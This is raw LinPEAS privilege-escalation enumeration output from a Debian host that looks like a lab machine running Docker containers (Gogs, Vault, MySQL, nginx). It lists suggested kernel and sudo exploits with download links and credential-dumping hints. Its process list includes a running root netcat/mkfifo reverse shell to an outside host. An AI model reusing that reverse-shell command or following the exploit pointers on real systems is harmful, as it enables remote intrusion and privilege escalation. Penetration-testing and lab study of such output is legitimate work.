╔═══════════════════╗
═══════════════════════════════╣ Basic information ╠═══════════════════════════════
╚═══════════════════╝
OS: Linux version 6.1.0-12-amd64 (debian-kernel@[Link]) (gcc-12 (Debian
12.2.0-14) 12.2.0, GNU ld (GNU Binutils for Debian) 2.40) #1 SMP PREEMPT_DYNAMIC
Debian 6.1.52-1 (2023-09-07)
User & Groups: uid=1001(gilfoyle) gid=1001(gilfoyle) groups=1001(gilfoyle)
Hostname: [Link]
[+] /bin/ping is available for network discovery (LinPEAS can discover hosts, learn more with -h)
[+] /bin/bash is available for network discovery, port scanning and port forwarding (LinPEAS can discover hosts, scan ports, and forward ports. Learn more with -h)
Caching directories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . DONE
╔════════════════════╗
══════════════════════════════╣ System Information ╠══════════════════════════════
╚════════════════════╝
╔══════════╣ Operative system
╚ [Link]
[Link]#kernel-exploits
Linux version 6.1.0-12-amd64 (debian-kernel@[Link]) (gcc-12 (Debian
12.2.0-14) 12.2.0, GNU ld (GNU Binutils for Debian) 2.40) #1 SMP PREEMPT_DYNAMIC
Debian 6.1.52-1 (2023-09-07)
Distributor ID: Debian
Description: Debian GNU/Linux 9.7 (stretch)
Release: 9.7
Codename: stretch
╔══════════╣ Sudo version
sudo Not Found
╔══════════╣ PATH
╚ [Link]
[Link]#writable-path-abuses
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
╔══════════╣ Date & uptime
Sun Nov 30 [Link] EST 2025
[Link] up 3:01, 1 user, load average: 0.70, 0.20, 0.07
╔══════════╣ Unmounted file-system?
╚ Check if you can mount umounted devices
UUID=c8eb8ae3-1520-4599-b5f0-951dbbacd46a / ext4 errors=remount-ro 0 1
UUID=6ef792f3-2a5c-426c-bf3e-a3da60d2d9a5 none swap sw 0 0
/dev/sr0 /media/cdrom0 udf,iso9660 user,noauto 0 0
╔══════════╣ Any sd*/disk* disk in /dev? (limit 20)
disk
sda
sda1
sda2
sda5
╔══════════╣ Environment
╚ Any private information inside environment variables?
MAIL=/var/mail/gilfoyle
USER=gilfoyle
SSH_CLIENT=[Link] 60846 22
VAULT_ADDR=[Link]
SHLVL=1
HOME=/home/gilfoyle
SSH_TTY=/dev/pts/0
LOGNAME=gilfoyle
_=./[Link]
TERM=xterm-256color
XDG_RUNTIME_DIR=/run/user/1001
LANG=en_US.UTF-8
SHELL=/bin/bash
PWD=/home/gilfoyle
SSH_CONNECTION=[Link] 60846 [Link] 22
╔══════════╣ Searching Signature verification failed in dmesg
╚ [Link]
[Link]#dmesg-signature-verification-failed
dmesg Not Found
╔══════════╣ Executing Linux Exploit Suggester
╚ [Link]
[+] [CVE-2021-4034] PwnKit
Details: [Link]
Exposure: probable
Tags: ubuntu=10|11|12|13|14|15|16|17|18|19|20|21,[ debian=7|8|9|10|11 ],fedora,manjaro
Download URL: [Link]
[+] [CVE-2018-1000001] RationalLove
Details: [Link]
Exposure: probable
Tags: [ debian=9 ]{libc6:2.24-11+deb9u1},ubuntu=16.04.3{libc6:2.23-0ubuntu9}
Download URL: [Link]
Comments: kernel.unprivileged_userns_clone=1 required
[+] [CVE-2022-2586] nft_object UAF
Details: [Link]
Exposure: less probable
Tags: ubuntu=(20.04){kernel:5.12.13}
Download URL: [Link]
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
[+] [CVE-2021-3156] sudo Baron Samedit
Details: [Link] [Link]
Exposure: less probable
Tags: mint=19,ubuntu=18|20, debian=10
Download URL: [Link]
[+] [CVE-2021-3156] sudo Baron Samedit 2
Details: [Link] [Link]
Exposure: less probable
Tags: centos=6|7|8,ubuntu=14|16|17|18|19|20, debian=9|10
Download URL: [Link]
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
Details: [Link] [Link]
Exposure: less probable
Tags: ubuntu=20.04{kernel:5.8.0-*}
Download URL:
[Link]
2021-22555/exploit.c
ext-url: [Link]
2021-22555/exploit.c
Comments: ip_tables kernel module must be loaded
[+] [CVE-2019-18634] sudo pwfeedback
Details: [Link]
Exposure: less probable
Tags: mint=19
Download URL: [Link]
Comments: sudo configuration requires pwfeedback to be enabled.
[+] [CVE-2017-1000366,CVE-2017-1000379] linux_ldso_hwcap_64
Details: [Link]
Exposure: less probable
Tags: debian=7.7|8.5|9.0,ubuntu=14.04.2|16.04.2|17.04,fedora=22|25,centos=7.3.1611
Download URL: [Link]
Comments: Uses "Stack Clash" technique, works against most SUID-root binaries
╔══════════╣ Protections
═╣ AppArmor enabled? .............. AppArmor Not Found
═╣ AppArmor profile? .............. unconfined
═╣ is linuxONE? ................... s390x Not Found
═╣ grsecurity present? ............ grsecurity Not Found
═╣ PaX bins present? .............. PaX Not Found
═╣ Execshield enabled? ............ Execshield Not Found
═╣ SELinux enabled? ............... sestatus Not Found
═╣ Seccomp enabled? ............... disabled
═╣ User namespace? ................ enabled
═╣ Cgroup2 enabled? ............... enabled
═╣ Is ASLR enabled? ............... Yes
═╣ Printer? ....................... No
═╣ Is this a virtual machine? ..... Yes (vmware)
╔══════════╣ Kernel Modules Information
══╣ Kernel modules with weak perms?
══╣ Kernel modules loadable?
Modules can be loaded
╔═══════════╗
═══════════════════════════════════╣ Container ╠═══════════════════════════════════
╚═══════════╝
╔══════════╣ Container related tools present (if any):
/usr/bin/docker
/usr/bin/runc
/usr/bin/ctr
/usr/bin/containerd
/usr/local/bin/docker-compose
/usr/bin/docker-proxy
/usr/bin/nsenter
/usr/bin/unshare
/usr/sbin/chroot
/sbin/capsh
/sbin/setcap
/sbin/getcap
╔══════════╣ Container details
═╣ Is this a container? ........... No
═╣ Docker version ............... Client: Docker Engine - Community
Version: 19.03.15
API version: 1.40
Go version: go1.13.15
Git commit: 99e3ed8919
Built: Sat Jan 30 [Link] 2021
OS/Arch: linux/amd64
Experimental: false
docker Not Found
═╣ Docker info ................. Client:
Debug Mode: false
Server:
ERROR: Got permission denied while trying to connect to the Docker daemon socket at unix:///var/run/[Link]: Get [Link] dial unix /var/run/[Link]: connect: permission denied
docker Not Found
═╣ Any running containers? ........ No
╔═══════╗
═════════════════════════════════════╣ Cloud ╠═════════════════════════════════════
╚═══════╝
Learn and practice cloud hacking techniques in [Link]
═╣ GCP Virtual Machine? ................. No
═╣ GCP Cloud Funtion? ................... No
═╣ AWS ECS? ............................. No
═╣ AWS EC2? ............................. No
═╣ AWS EC2 Beanstalk? ................... No
═╣ AWS Lambda? .......................... No
═╣ AWS Codebuild? ....................... No
═╣ DO Droplet? .......................... No
═╣ IBM Cloud VM? ........................ No
═╣ Azure VM or Az metadata? ............. No
═╣ Azure APP or IDENTITY_ENDPOINT? ...... No
═╣ Azure Automation Account? ............ No
═╣ Aliyun ECS? .......................... No
═╣ Tencent CVM? ......................... No
╔════════════════════════════════════════════════╗
════════════════╣ Processes, Crons, Timers, Services and Sockets ╠════════════════
╚════════════════════════════════════════════════╝
╔══════════╣ Running processes (cleaned)
╚ Check weird & unexpected processes run by root:
[Link]
[Link]#processes
root 1 0.0 0.3 57004 6812 ? Ss 05:13 0:00 /sbin/init
root 311 0.0 0.3 51156 6084 ? Ss 05:13 0:00
/lib/systemd/systemd-journald
root 312 0.0 0.6 214192 13520 ? Ssl 05:13 0:09 /usr/bin/vmtoolsd
root 344 0.0 0.2 47300 4852 ? Ss 05:13 0:00
/lib/systemd/systemd-udevd
systemd+ 387 0.0 0.3 127300 6156 ? Ssl 05:13 0:00
/lib/systemd/systemd-timesyncd
└─(Caps) 0x0000000002000000=cap_sys_time
root 508 0.0 0.2 250124 5044 ? Ssl 05:13 0:00 /usr/sbin/rsyslogd
-n
root 509 0.0 0.9 153536 18308 ? Ss 05:13 0:00
/usr/bin/VGAuthService
root 511 0.0 0.1 29644 2768 ? Ss 05:13 0:00 /usr/sbin/cron -f
root 512 0.0 0.2 46436 4864 ? Ss 05:13 0:00
/lib/systemd/systemd-logind
message+ 513 0.0 0.1 45180 3948 ? Ss 05:13 0:00 /usr/bin/dbus-
daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
└─(Caps) 0x0000000020000000=cap_audit_write
root 583 0.0 0.1 20496 2940 ? Ss 05:13 0:00 /sbin/dhclient -4
-v -pf /run/[Link] -lf /var/lib/dhcp/[Link] -I -df
/var/lib/dhcp/[Link] eth0
root 629 0.0 0.0 14544 1712 tty1 Ss+ 05:13 0:00 /sbin/agetty --
noclear tty1 linux
root 634 0.0 3.0 692136 62248 ? Ssl 05:13 0:08
/usr/bin/containerd
root 1021 0.0 0.5 108824 10976 ? Sl 05:14 0:00 _ containerd-shim
-namespace moby -workdir
/var/lib/containerd/[Link]/moby/47a81a3348a99bbc3bc112b6fc1
2fb85211e59c152d385c52fb3d9310e112906 -address /run/containerd/[Link] -
containerd-binary /usr/bin/containerd -runtime-root /var/run/docker/runtime-runc
root 1038 0.2 4.0 82512 81056 ? SLsl 05:14 0:30 | _ vault
server -config /vault/config/[Link]
root 1131 0.0 0.6 110232 12596 ? Sl 05:14 0:00 _ containerd-shim
-namespace moby -workdir
/var/lib/containerd/[Link]/moby/82cbcaeb4fb97d3dd2b3d46a76c
fa670a3cf2bf2735544b38f4cd8be7df895a0 -address /run/containerd/[Link] -
containerd-binary /usr/bin/containerd -runtime-root /var/run/docker/runtime-runc
root 1148 0.0 1.6 35228 32776 ? Ss 05:14 0:02 | _ python
./[Link]
root 1238 0.0 0.6 108824 12540 ? Sl 05:14 0:00 _ containerd-shim
-namespace moby -workdir
/var/lib/containerd/[Link]/moby/eac0517a7e2cbe67d8a5b4a2961
7bcada68e5b4d26428ff5893a0b424a15d376 -address /run/containerd/[Link] -
containerd-binary /usr/bin/containerd -runtime-root /var/run/docker/runtime-runc
999 1255 0.5 21.9 1826400 442984 ? Ssl 05:14 0:54 | _ mysqld
root 1353 0.0 0.6 108824 13644 ? Sl 05:14 0:00 _ containerd-shim
-namespace moby -workdir
/var/lib/containerd/[Link]/moby/a9051fdd79e704d48a34e8ad973
812a131db055bef1016be44d2ac4782794530 -address /run/containerd/[Link] -
containerd-binary /usr/bin/containerd -runtime-root /var/run/docker/runtime-runc
root 1372 0.0 0.0 1068 484 ? Ss 05:14 0:00 | _ /bin/s6-
svscan /app/gogs/docker/s6/
root 1475 0.0 0.0 1072 520 ? S 05:14 0:00 | _ s6-
supervise crond
root 1476 0.0 0.0 1072 496 ? S 05:14 0:00 | _ s6-
supervise gogs
1000 1824 0.0 2.8 130724 58248 ? Ssl 05:14 0:03 | | _
/app/gogs/gogs web
root 1477 0.0 0.0 1072 416 ? S 05:14 0:00 | _ s6-
supervise syslogd
root 1480 0.0 0.0 1528 4 ? Ss 05:14 0:00 | | _
/sbin/syslogd -nS -O-
root 1478 0.0 0.0 1072 452 ? S 05:14 0:00 | _ s6-
supervise openssh
root 1479 0.0 0.1 4288 2916 ? Ss 05:14 0:00 | _
/usr/sbin/sshd -D -f /app/gogs/docker/sshd_config
root 1518 0.0 0.6 110232 12472 ? Sl 05:14 0:00 _ containerd-shim
-namespace moby -workdir
/var/lib/containerd/[Link]/moby/5a3d243127f5cfeb97bc6332eda
2e4ceae19472421c0c5a7d226fb5fc1ef0f7c -address /run/containerd/[Link] -
containerd-binary /usr/bin/containerd -runtime-root /var/run/docker/runtime-runc
root 1536 0.0 2.2 48232 45192 ? Ssl 05:14 0:03 | _ python
./[Link]
root 17410 0.0 0.0 1592 1080 ? S 07:18 0:00 | _ sh -c
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [Link] 443 >/tmp/f
root 17413 0.0 0.0 1540 4 ? S 07:18 0:00 | _ cat
/tmp/f
root 17414 0.0 0.0 1592 924 ? S 07:18 0:00 | _
/bin/sh -i
root 17415 0.0 0.0 1544 4 ? S 07:18 0:00 | _ nc
[Link] 443
root 1674 0.0 0.6 108824 12592 ? Sl 05:14 0:02 _ containerd-shim
-namespace moby -workdir
/var/lib/containerd/[Link]/moby/161f4d385ed0a3b8382aa28e788
3980d6b40b61e38899a5af8e34862289471d1 -address /run/containerd/[Link] -
containerd-binary /usr/bin/containerd -runtime-root /var/run/docker/runtime-runc
root 1708 0.0 0.3 36876 6192 ? Ss 05:14 0:00 _ nginx:
master process nginx -g daemon off;
root 1802 0.5 0.3 37492 6220 ? S 05:14 1:01 _ nginx:
worker process
root 636 0.0 0.3 69968 6224 ? Ss 05:13 0:00 /usr/sbin/sshd -D
gilfoyle 20977 0.0 0.2 101400 4632 ? S 08:06 0:00 _ sshd:
gilfoyle@pts/0
gilfoyle 20978 0.0 0.2 21192 5200 pts/0 Ss 08:06 0:00 _ -bash
gilfoyle 17455 0.4 0.1 5108 2508 pts/0 S+ 08:14 0:00 _
/bin/sh ./[Link]
gilfoyle 20716 0.0 0.0 5108 988 pts/0 S+ 08:14 0:00 _
/bin/sh ./[Link]
gilfoyle 20720 0.0 0.1 38636 3676 pts/0 R+ 08:14 0:00 |
_ ps fauxwww
gilfoyle 20719 0.0 0.0 5108 988 pts/0 S+ 08:14 0:00 _
/bin/sh ./[Link]
root 700 0.1 4.9 537000 99568 ? Ssl 05:13 0:11 /usr/bin/dockerd -
H fd:// --containerd=/run/containerd/[Link]
root 1346 0.0 0.5 216880 11660 ? Sl 05:14 0:00 _
/usr/bin/docker-proxy -proto tcp -host-ip [Link] -host-port 6022 -container-ip
[Link] -container-port 6022
root 1649 0.0 0.5 225076 11704 ? Sl 05:14 0:00 _
/usr/bin/docker-proxy -proto tcp -host-ip [Link] -host-port 443 -container-ip
[Link] -container-port 443
root 1664 0.0 0.5 298808 11764 ? Sl 05:14 0:00 _
/usr/bin/docker-proxy -proto tcp -host-ip [Link] -host-port 80 -container-ip
[Link] -container-port 80
gilfoyle 20970 0.0 0.3 65004 6528 ? Ss 08:06 0:00
/lib/systemd/systemd --user
gilfoyle 20971 0.0 0.0 84588 1640 ? S 08:06 0:00 _ (sd-pam)
gilfoyle 10280 0.0 0.1 91616 3144 ? SLs 08:14 0:00 _ /usr/bin/gpg-
agent --supervised
systemd+ 8380 0.0 0.2 49636 4168 ? Ss 08:14 0:00
/lib/systemd/systemd-resolved
gilfoyle 8464 0.0 0.0 11176 252 pts/0 S 08:14 0:00 bash -c (echo
>/dev/tcp/[Link]/80 2>/dev/null && echo "Port 80 is accessible" && exit 0)
2>/dev/null || echo "Port 80 is not accessible"
gilfoyle 8468 0.0 0.1 11184 2252 pts/0 S 08:14 0:00 bash -c ((( echo
cfc9 0100 0001 0000 0000 0000 0a64 7563 6b64 7563 6b67 6f03 636f 6d00 0001 0001 |
xxd -p -r >&3; dd bs=9000 count=1 <&3 2>/dev/null | xxd ) 3>/dev/udp/[Link]/53 &&
echo "DNS accessible") | grep "accessible" && exit 0 ) 2>/dev/null || echo "DNS is
not accessible"
gilfoyle 8469 0.0 0.0 11184 268 pts/0 S 08:14 0:00 _ bash -c
((( echo cfc9 0100 0001 0000 0000 0000 0a64 7563 6b64 7563 6b67 6f03 636f 6d00 0001
0001 | xxd -p -r >&3; dd bs=9000 count=1 <&3 2>/dev/null | xxd )
3>/dev/udp/[Link]/53 && echo "DNS accessible") | grep "accessible" && exit 0 )
2>/dev/null || echo "DNS is not accessible"
gilfoyle 8472 0.0 0.1 11184 2380 pts/0 S 08:14 0:00 | _ bash -c (((
echo cfc9 0100 0001 0000 0000 0000 0a64 7563 6b64 7563 6b67 6f03 636f 6d00 0001
0001 | xxd -p -r >&3; dd bs=9000 count=1 <&3 2>/dev/null | xxd )
3>/dev/udp/[Link]/53 && echo "DNS accessible") | grep "accessible" && exit 0 )
2>/dev/null || echo "DNS is not accessible"
gilfoyle 8486 0.0 0.0 5888 660 pts/0 S 08:14 0:00 | _ dd
bs=9000 count=1
gilfoyle 8487 0.0 0.0 4200 616 pts/0 S 08:14 0:00 | _ xxd
gilfoyle 8470 0.0 0.0 12792 960 pts/0 S 08:14 0:00 _ grep accessible
gilfoyle 8480 0.0 0.0 11176 248 pts/0 S 08:14 0:00 bash -c (echo
>/dev/tcp/[Link]/443 2>/dev/null && echo "Port 443 is accessible" && exit 0)
2>/dev/null || echo "Port 443 is not accessible"
╔══════════╣ Processes with unusual configurations
╔══════════╣ Processes with credentials in memory (root req)
╚ [Link]
[Link]#credentials-from-process-memory
gdm-password Not Found
gnome-keyring-daemon Not Found
lightdm Not Found
vsftpd Not Found
apache2 Not Found
sshd: process found (dump creds from memory as root)
mysql process found (dump creds from memory as root)
postgres Not Found
redis-server Not Found
mongod Not Found
memcached Not Found
elasticsearch Not Found
jenkins Not Found
tomcat Not Found
nginx process found (dump creds from memory as root)
php-fpm Not Found
supervisord Not Found
vncserver Not Found
xrdp Not Found
teamviewer Not Found
╔══════════╣ Opened Files by processes
Process 8464 (gilfoyle) - bash -c (echo >/dev/tcp/[Link]/80 2>/dev/null &&
echo "Port 80 is accessible" && exit 0) 2>/d
└─ Has open files:
└─ /dev/pts/0
Process 8468 (gilfoyle) - bash -c ((( echo cfc9 0100 0001 0000 0000 0000 0a64 7563
6b64 7563 6b67 6f03 636f 6d00 0001 0001 | x
└─ Has open files:
└─ /dev/pts/0
Process 8469 (gilfoyle) - bash -c ((( echo cfc9 0100 0001 0000 0000 0000 0a64 7563
6b64 7563 6b67 6f03 636f 6d00 0001 0001 | x
└─ Has open files:
└─ pipe:[275738]
Process 8470 (gilfoyle) - grep accessible
└─ Has open files:
└─ pipe:[275738]
└─ /dev/pts/0
Process 8472 (gilfoyle) - bash -c ((( echo cfc9 0100 0001 0000 0000 0000 0a64 7563
6b64 7563 6b67 6f03 636f 6d00 0001 0001 | x
└─ Has open files:
└─ pipe:[275738]
Process 8480 (gilfoyle) - bash -c (echo >/dev/tcp/[Link]/443 2>/dev/null &&
echo "Port 443 is accessible" && exit 0) 2>
└─ Has open files:
└─ /dev/pts/0
Process 8486 (gilfoyle) - dd bs=9000 count=1
└─ Has open files:
└─ pipe:[275745]
Process 8487 (gilfoyle) - xxd
└─ Has open files:
└─ pipe:[275745]
└─ pipe:[275738]
Process 20970 (gilfoyle) - /lib/systemd/systemd --user
└─ Has open files:
└─ /proc/20970/mountinfo
└─ /proc/swaps
└─ /sys/fs/cgroup/systemd/[Link]/[Link]/user@[Link]
Process 20978 (gilfoyle) - -bash
└─ Has open files:
└─ /dev/pts/0
╔══════════╣ Processes with memory-mapped credential files
╔══════════╣ Processes whose PPID belongs to a different user (not root)
╚ You will know if a user can somehow spawn processes as a different user
╔══════════╣ Files opened by processes belonging to other users
╚ This is usually empty because of the lack of privileges to read other user processes information
╔══════════╣ Check for vulnerable cron jobs
╚ [Link]
[Link]#scheduledcron-jobs
══╣ Cron jobs list
/usr/bin/crontab
incrontab Not Found
-rw-r--r-- 1 root root 722 Oct 7 2017 /etc/crontab
/etc/cron.d:
total 12
drwxr-xr-x 2 root root 4096 Nov 16 2023 .
drwxr-xr-x 80 root root 4096 Nov 30 08:15 ..
-rw-r--r-- 1 root root 102 Oct 7 2017 .placeholder
/etc/[Link]:
total 36
drwxr-xr-x 2 root root 4096 Nov 16 2023 .
drwxr-xr-x 80 root root 4096 Nov 30 08:15 ..
-rwxr-xr-x 1 root root 1474 Sep 13 2017 apt-compat
-rwxr-xr-x 1 root root 355 Oct 25 2016 bsdmainutils
-rwxr-xr-x 1 root root 1597 Jun 25 2018 dpkg
-rwxr-xr-x 1 root root 89 May 5 2015 logrotate
-rwxr-xr-x 1 root root 1065 Dec 13 2016 man-db
-rwxr-xr-x 1 root root 249 May 17 2017 passwd
-rw-r--r-- 1 root root 102 Oct 7 2017 .placeholder
/etc/[Link]:
total 12
drwxr-xr-x 2 root root 4096 Nov 16 2023 .
drwxr-xr-x 80 root root 4096 Nov 30 08:15 ..
-rw-r--r-- 1 root root 102 Oct 7 2017 .placeholder
/etc/[Link]:
total 12
drwxr-xr-x 2 root root 4096 Nov 16 2023 .
drwxr-xr-x 80 root root 4096 Nov 30 08:15 ..
-rw-r--r-- 1 root root 102 Oct 7 2017 .placeholder
/etc/[Link]:
total 16
drwxr-xr-x 2 root root 4096 Nov 16 2023 .
drwxr-xr-x 80 root root 4096 Nov 30 08:15 ..
-rwxr-xr-x 1 root root 723 Dec 13 2016 man-db
-rw-r--r-- 1 root root 102 Oct 7 2017 .placeholder
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 * * * * root cd / && run-parts --report /etc/[Link]
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/[Link] )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/[Link] )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/[Link] )
══╣ Checking for specific cron jobs vulnerabilities
Checking cron directories...
╔══════════╣ System timers
╚ [Link]
[Link]#timers
══╣ Active timers:
NEXT LEFT LAST PASSED UNIT ACTIVATES
Sun 2025-11-30 [Link] EST 8h left Sun 2025-11-30 [Link] EST 3h 1min ago [Link] [Link]
Mon 2025-12-01 [Link] EST 21h left Sun 2025-11-30 [Link] EST 2h 46min ago [Link] [Link]
Mon 2025-12-01 [Link] EST 22h left Sun 2025-11-30 [Link] EST 2h 5min ago [Link] [Link]
══╣ Disabled timers:
══╣ Additional timer files:
╔══════════╣ Services and Service Files
╚ [Link]
[Link]#services
══╣ Active services:
[Link] loaded active exited Set console font and keymap
[Link] loaded active running containerd container runtime
./[Link]: 3944: local: /usr/bin/containerd: bad variable name
Not Found
══╣ Disabled services:
[Link] disabled
[Link] disabled
[Link] disabled
[Link] disabled
serial-getty@.service disabled
[Link] disabled
[Link] disabled
[Link] disabled
8 unit files listed.
══╣ Additional service files:
./[Link]: 3944: local: /usr/bin/containerd: bad variable name
You can't write on systemd PATH
╔══════════╣ Systemd Information
╚ [Link]
[Link]#systemd-path---relative-paths
═╣ Systemd version and vulnerabilities? ..............
═╣ Services running as root? .....
═╣ Running services with dangerous capabilities? ...
═╣ Services with writable paths? . [Link]: Uses relative path 'overlay' (from ExecStartPre=-/sbin/modprobe overlay)
[Link]: Uses relative path '-n' (from ExecStart=/usr/sbin/rsyslogd -n)
╔══════════╣ Systemd PATH
╚ [Link]
[Link]#systemd-path---relative-paths
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
╔══════════╣ Analyzing .socket files
╚ [Link]
[Link]#sockets
./[Link]: 4207: local: /run/systemd/journal/socket: bad variable name
╔══════════╣ Unix Sockets Analysis
╚ [Link]
[Link]#sockets
/run/containerd/[Link]
/run/containerd/[Link]
/run/dbus/system_bus_socket
└─(Read Write (Weak Permissions: 666) )
└─(Owned by root)
/run/[Link]
/run/systemd/cgroups-agent
/run/systemd/[Link]
/run/systemd/journal/dev-log
└─(Read Write (Weak Permissions: 666) )
└─(Owned by root)
/run/systemd/journal/socket
└─(Read Write (Weak Permissions: 666) )
└─(Owned by root)
/run/systemd/journal/stdout
└─(Read Write (Weak Permissions: 666) )
└─(Owned by root)
/run/systemd/journal/syslog
└─(Read Write (Weak Permissions: 666) )
└─(Owned by root)
/run/systemd/notify
└─(Read Write Execute (Weak Permissions: 777) )
└─(Owned by root)
/run/systemd/private
└─(Read Write Execute (Weak Permissions: 777) )
└─(Owned by root)
/run/udev/control
/run/user/1001/gnupg/[Link]-agent
└─(Read Write )
/run/user/1001/gnupg/[Link]
└─(Read Write )
/run/user/1001/gnupg/[Link]
└─(Read Write )
/run/user/1001/gnupg/[Link]
└─(Read Write )
/run/user/1001/systemd/notify
└─(Read Write Execute )
/run/user/1001/systemd/private
└─(Read Write Execute )
/run/vmware/guestServicePipe
└─(Read Write (Weak Permissions: 666) )
└─(Owned by root)
/var/run/dbus/system_bus_socket
└─(Read Write (Weak Permissions: 666) )
└─(Owned by root)
/var/run/[Link]
/var/run/vmware/guestServicePipe
└─(Read Write (Weak Permissions: 666) )
└─(Owned by root)
╔══════════╣ D-Bus Analysis
╚ [Link]
[Link]#d-bus
NAME PID PROCESS USER CONNECTION UNIT SESSION DESCRIPTION
:1.0 1 systemd root :1.0 [Link] - -
:1.1 512 systemd-logind root :1.1 [Link] - -
:1.109 8380 systemd-resolve systemd-resolve :1.109 [Link] - -
:1.204 6766 busctl gilfoyle :1.204 [Link] 179 -
[Link] - - - (activatable) - -
[Link] 513 dbus-daemon messagebus [Link] [Link] - -
[Link] - - - (activatable) - -
[Link].PolicyKit1 - - - (activatable) - -
[Link].hostname1 - - - (activatable) - -
[Link].locale1 - - - (activatable) - -
[Link].login1 512 systemd-logind root :1.1 [Link] - -
[Link].network1 - - - (activatable) - -
[Link].resolve1 8380 systemd-resolve systemd-resolve :1.109 [Link] - -
[Link].systemd1 1 systemd root :1.0 [Link] - -
[Link].timedate1 - - - (activatable) - -
╔══════════╣ D-Bus Configuration Files
Analyzing /etc/dbus-1/system.d/[Link]:
└─(Allow rules in default context)
└─ <allow send_destination="[Link]"
<allow send_destination="[Link]"
<allow send_destination="[Link]"
Analyzing /etc/dbus-1/system.d/[Link]:
└─(Allow rules in default context)
└─ <allow send_destination="[Link]"
<allow send_destination="[Link]"
<allow send_destination="[Link]"
Analyzing /etc/dbus-1/system.d/[Link]:
└─(Allow rules in default context)
└─ <allow send_destination="[Link].PolicyKit1"/>
Analyzing /etc/dbus-1/system.d/[Link]:
└─(Allow rules in default context)
└─ <allow send_destination="[Link].hostname1"/>
<allow receive_sender="[Link].hostname1"/>
Analyzing /etc/dbus-1/system.d/[Link]:
└─(Allow rules in default context)
└─ <allow send_destination="[Link].locale1"/>
<allow receive_sender="[Link].locale1"/>
Analyzing /etc/dbus-1/system.d/[Link]:
└─(Allow rules in default context)
└─ <allow send_destination="[Link].login1"
Analyzing /etc/dbus-1/system.d/[Link]:
└─(Weak user policy found)
└─ <policy user="systemd-network">
└─(Allow rules in default context)
└─ <allow send_destination="[Link].network1"
Analyzing /etc/dbus-1/system.d/[Link]:
└─(Weak user policy found)
└─ <policy user="systemd-resolve">
└─(Allow rules in default context)
└─ <allow send_destination="[Link].resolve1"/>
<allow receive_sender="[Link].resolve1"/>
Analyzing /etc/dbus-1/system.d/[Link]:
└─(Allow rules in default context)
└─ <allow send_destination="[Link].systemd1"
Analyzing /etc/dbus-1/system.d/[Link]:
└─(Allow rules in default context)
└─ <allow send_destination="[Link].timedate1"/>
<allow receive_sender="[Link].timedate1"/>
══╣ D-Bus Session Bus Analysis
(Access to session bus available)
╔══════════╣ Legacy r-commands (rsh/rlogin/rexec) and host-based trust
══╣ Listening r-services (TCP 512-514)
══╣ systemd units exposing r-services
rlogin|rsh|rexec units Not Found
══╣ inetd/xinetd configuration for r-services
/etc/[Link] Not Found
/etc/xinetd.d Not Found
══╣ Installed r-service server packages
No related packages found via dpkg
══╣ /etc/[Link] and /etc/[Link]
══╣ Per-user .rhosts files
.rhosts Not Found
══╣ PAM rhosts authentication
/etc/pam.d/rlogin|rsh Not Found
══╣ SSH HostbasedAuthentication
HostbasedAuthentication no or not set
══╣ Potential DNS control indicators (local)
Not detected
╔══════════╣ Crontab UI (root) misconfiguration checks
╚ [Link]
[Link]#scheduledcron-jobs
crontab-ui Not Found
╔═════════════════════╗
══════════════════════════════╣ Network Information ╠══════════════════════════════
╚═════════════════════╝
╔══════════╣ Interfaces
default [Link]
loopback [Link]
link-local [Link]
br-2126e7722b3e: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet [Link] netmask [Link] broadcast [Link]
inet6 fe80::42:7ff:fe3e:4a30 prefixlen 64 scopeid 0x20<link>
ether [Link] txqueuelen 0 (Ethernet)
RX packets 262156 bytes 53586848 (51.1 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 308094 bytes 92686417 (88.3 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
br-26e562541429: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
inet [Link] netmask [Link] broadcast [Link]
ether [Link] txqueuelen 0 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
br-6d19c883b122: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
inet [Link] netmask [Link] broadcast [Link]
ether [Link] txqueuelen 0 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
docker0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
inet [Link] netmask [Link] broadcast [Link]
ether [Link] txqueuelen 0 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet [Link] netmask [Link] broadcast [Link]
inet6 fe80::250:56ff:feb0:3e4a prefixlen 64 scopeid 0x20<link>
inet6 [Link] prefixlen 64 scopeid 0x0<global>
ether [Link] txqueuelen 1000 (Ethernet)
RX packets 334151 bytes 95667630 (91.2 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 266860 bytes 57612468 (54.9 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet [Link] netmask [Link]
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 30 bytes 2862 (2.7 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 30 bytes 2862 (2.7 KiB)
